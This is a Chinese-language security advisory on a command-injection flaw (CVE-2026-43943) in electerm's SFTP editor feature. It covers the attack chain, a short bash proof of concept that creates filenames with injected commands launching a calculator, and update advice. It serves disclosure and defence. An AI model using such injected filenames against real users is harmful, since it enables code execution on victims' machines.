CVE-2026-43943 electerm远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2026-43943

漏洞类型

远程代码执行 (RCE)

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

electerm

漏洞概述

electerm是一款流行的开源终端模拟器。在3.7.9版本之前，软件在SFTP功能中存在严重的安全缺陷。当用户使用系统编辑器或自定义编辑器功能打开文件时，文件名未经清理直接传入命令行。攻击者可通过包含Shell元字符的恶意文件名，诱使用户编辑文件，从而在受害者机器上执行任意命令，获取系统控制权。

技术细节

该漏洞的根本原因是命令注入。electerm在处理“使用系统编辑器打开”或“使用自定义编辑器编辑”的请求时，将用户选择的文件名直接拼接到系统调用命令中，未对文件名中的特殊字符进行转义或过滤。攻击者若能控制SFTP服务器端，可创建包含恶意Shell命令的文件名（例如 `file.txt; malicious_command`）。当受害者通过受影响版本的electerm客户端编辑该文件时，由于文件名未经验证直接执行，攻击者注入的命令将在受害者的本地操作系统环境中以当前用户的权限运行，导致远程代码执行。

攻击链分析

STEP 1

1. 环境准备

攻击者控制一个SSH服务器，或者能够向受害者的electerm SFTP目录写入文件。

STEP 2

2. 构造恶意文件

攻击者在服务器上创建一个包含Shell元字符（如分号、反引号）的文件名，其中嵌入了要执行的恶意命令。

STEP 3

3. 诱导交互

受害者使用存在漏洞的electerm客户端连接到该服务器，并浏览到包含恶意文件的目录。

STEP 4

4. 触发漏洞

受害者尝试使用“系统编辑器打开”或“使用自定义编辑器编辑”功能打开该恶意文件。

STEP 5

5. 执行代码

electerm将未经过滤的文件名传递给系统Shell执行，导致注入的恶意命令在受害者本地机器上运行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-43943
# Description: Create a file with a malicious filename on the SSH/SFTP server.
# When victim opens this file with electerm's editor, the command executes.

# Payload to open calculator on Linux/macOS
MALICIOUS_FILENAME="safe_file.txt; xcalc; #"

# Payload to open calculator on Windows
# MALICIOUS_FILENAME="safe_file.txt & calc.exe &"

# Create the file on the server (simulated)
touch "$MALICIOUS_FILENAME"

echo "Created file: $MALICIOUS_FILENAME"
echo "If a victim edits this file using electerm < 3.7.9, the command will execute."

影响范围

electerm < 3.7.9

防御指南

临时缓解措施

建议用户尽快将electerm更新至包含修复补丁的3.7.9版本。在无法立即更新时，应谨慎使用编辑功能，不要编辑来自不可信SSH服务器或文件名包含特殊符号（如;、&、|、$等）的文件，以防止命令注入攻击。